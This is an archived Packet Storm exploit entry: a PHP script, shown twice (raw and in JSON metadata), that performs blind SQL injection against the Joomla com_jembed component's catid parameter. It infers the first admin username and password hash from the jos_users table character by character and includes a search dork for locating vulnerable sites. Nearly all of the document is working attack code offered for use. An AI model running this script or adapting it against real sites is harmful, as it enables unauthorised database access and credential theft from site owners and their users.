ID PACKETSTORM:84837
Type packetstorm
Reporter Fl0riX
Modified 2010-01-06T00:00:00
Description
`
<?php
ini_set("max_execution_time",0);
print_r('
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author : FL0RiX
@~~=Greez : Dostumuz Yokki yazak
@~~=Dork : inurl:"com_jembed"
@~~=Bug : com_jembed (catid) Blind SQL Injection Exploit
@~~=WARNING! : : php file.php "http://www.site.com/index.php?option=com_jembed&task=summary&catid=99"
---------------Ooooo-------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
_________________________________________________________________
Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010`
{"id": "PACKETSTORM:84837", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla Jembed Blind SQL Injection", "description": "", "published": "2010-01-06T00:00:00", "modified": "2010-01-06T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/84837/Joomla-Jembed-Blind-SQL-Injection.html", "reporter": "Fl0riX", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:49", "viewCount": 4, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:28:49", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:49", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/84837/joomlajembed-sql.txt", "sourceData": "` \n<?php \nini_set(\"max_execution_time\",0); \nprint_r(' \n \n\\\\\\|/// \n\\\\ - - // \n( @ @ ) \n----oOOo--(_)-oOOo--------------------------- \n@~~=Author : FL0RiX \n \n@~~=Greez : Dostumuz Yokki yazak \n \n@~~=Dork : inurl:\"com_jembed\" \n \n@~~=Bug : com_jembed (catid) Blind SQL Injection Exploit \n \n@~~=WARNING! : : php file.php \"http://www.site.com/index.php?option=com_jembed&task=summary&catid=99\" \n---------------Ooooo------------------------- \n( ) \nooooO ) / \n( ) (_/ \n\\ ( \n\\_) \n \n \n'); \nif ($argc > 1) { \n$url = $argv[1]; \n$r = strlen(file_get_contents($url.\"+and+1=1--\")); \necho \"\\nExploiting:\\n\"; \n$w = strlen(file_get_contents($url.\"+and+1=0--\")); \n$t = abs((100-($w/$r*100))); \necho \"Username: \"; \nfor ($i=1; $i <= 30; $i++) { \n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$i.\",1))!=0--\")); \nif (abs((100-($laenge/$r*100))) > $t-1) { \n$count = $i; \n$i = 30; \n} \n} \nfor ($j = 1; $j < $count; $j++) { \nfor ($i = 46; $i <= 122; $i=$i+2) { \nif ($i == 60) { \n$i = 98; \n} \n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\")); \nif (abs((100-($laenge/$r*100))) > $t-1) { \n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\")); \nif (abs((100-($laenge/$r*100))) > $t-1) { \necho chr($i-1); \n} else { \necho chr($i); \n} \n$i = 122; \n} \n} \n} \necho \"\\nPassword: \"; \nfor ($j = 1; $j <= 49; $j++) { \nfor ($i = 46; $i <= 102; $i=$i+2) { \nif ($i == 60) { \n$i = 98; \n} \n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\")); \nif (abs((100-($laenge/$r*100))) > $t-1) { \n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\")); \nif (abs((100-($laenge/$r*100))) > $t-1) { \necho chr($i-1); \n} else { \necho chr($i); \n} \n$i = 102; \n} \n} \n} \n} \n?> \n_________________________________________________________________ \nWindows Live: Arkada\u00felar\u00fdn\u00fdz size e-posta g\u00f6nderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi g\u00f6r\u00fcrler. \nhttp://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010`\n"}
{}